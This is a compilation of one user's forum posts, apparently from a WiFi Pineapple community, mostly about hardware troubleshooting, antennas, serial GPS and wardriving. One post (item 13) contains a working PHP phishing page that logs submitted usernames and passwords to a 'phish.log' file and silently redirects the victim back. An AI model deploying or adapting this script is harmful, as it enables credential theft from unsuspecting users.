  1. Yea, Macs are weird when it comes to ICS... Actually they're weird with damn near everything... Look here.
  2. I think it got lost in the move. Here's the screenshots I took on my overloaded laptop though. Should help you guys out. Can't link the pictures, so here's the links to my picasa... https://picasaweb.google.com/lh/photo/Ja72Aaz1bvT5ctnd9snpEtMTjNZETYmyPJy0liipFm0?feat=directlink https://picasaweb.google.com/lh/photo/p8AffkHDY2WnFgXdugVH9dMTjNZETYmyPJy0liipFm0?feat=directlink
  3. There's a tab for that from the web interface.
  4. There used to be a sticky on this. ICS on a mac is different than the others. It's ip range is hard coded, so you have to change the pineapple's address and not the laptop's. I can't remember what it is now. I didn't bring a mac to defcon....
  5. Holy crap! Thirteen posts in three years!
  6. Cranking the power up will also crank up the noise. You should get pretty decent coverage with the stock antenna, if not your local micro center type store should carry 7dbi omni antennas at a reasonable price.
  7. Which is faster? That and not everyone has a hashcat compatible video card.
  8. Heh, you need to update your info on the forums, unless you moved back to VA!
  9. Easiest way would be to put it on a known good working device and see if the signal changes much.
  10. Probably has something to do with the massive power failures over the weekend. I have friends that just got power back yesterday.
  11. You think any pl2303 type usb cable will work? Damn! Installing kmod-usb-serial-pl2303 (3.3.8-1) to root... Downloading http://downloads.openwrt.org/snapshots/trunk/ar71xx/packages/kmod-usb-serial-pl2303_3.3.8-1_ar71xx.ipk. Multiple packages (kmod-usb-serial and kmod-usb-serial) providing same name marked HOLD or PREFER. Using latest. Collected errors: * satisfy_dependencies_for: Cannot satisfy the following dependencies for kmod-usb-serial-pl2303: * kernel (= 3.3.8-1-4ddea9f0072cefba7ba289ba2b5fa12f) * * opkg_install_cmd: Cannot install package kmod-usb-serial-pl2303.
  12. I used to buy from these guys when I lived in Alaska. Haven't needed anything wifi parts related in a while, but they ship stupid fast. They accidentally sent me the wrong part once, when I called them I had the correct part in the mail the next day! Overnight to AK from Florida, that's good customer service! http://www.fab-corp.com/ I did notice when I pulled mine apart the little blob of hot glue holding the pigtail wasn't stuck to anything anymore. A new blob of glue will probably help once you get the signal back to where it should be.
  13. <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("pineapple/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html>
  14. Yea. The GPS shows up as /dev/ttyS0 but it's not talking. Have to play around with it more to see what's missing. Well I've not found any way to set the port's settings. From snooping around the dd-wrt forums it looks like it's hard coded into the bootloader.
  15. I think it is! Currently running an EnGenius EAP9550 access point. So far so good.
  16. My wife has the x220 with the extra battery slice. It regularly gets 20 hours of battery life. She took it on a four day trip and never had to plug it in. Few hours here, few hours there type usage. It's a pretty sweet little laptop.
  17. Yea, if you borked the root password, you're going to have to reflash.
  18. Use your imagination!! :D http://www.lowes.com/Electrical/Electrical-Boxes-Conduit-Fittings/_/N-1z0yt3c/pl?Ns=p_product_qty_sales_dollar|1 I'm going to have to go spend a bit of money there... Warning!! You'll need a right angle usb and power adapters to use this box.. http://www.lowes.com/pd_130902-53911-E382DE_4294722500__?productId=3646226&Ns=p_product_qty_sales_dollar|1
  19. Heh. Missed that post. I'll have to figure out why it's not tall talking.
  20. Hey, quick question. Is the built in serial port ttl or standard rs-232?
  21. No. We used serial based gps devices directly connected. The 54g doesn't have usb capabilities.
  22. A few of us over on the netstumbler forums did this with linksys wrt-54g's. One of the moderators put a few in taxi cabs and let them wardrive for him. I think his brother ran the company or something. Someone else, I think it was Mother, modded his with a 3g radio, this was before every phone had internet access, or at least mostly cheap internet access. I might have to pull my serial gps out of my 54g and add it to my pineapple....
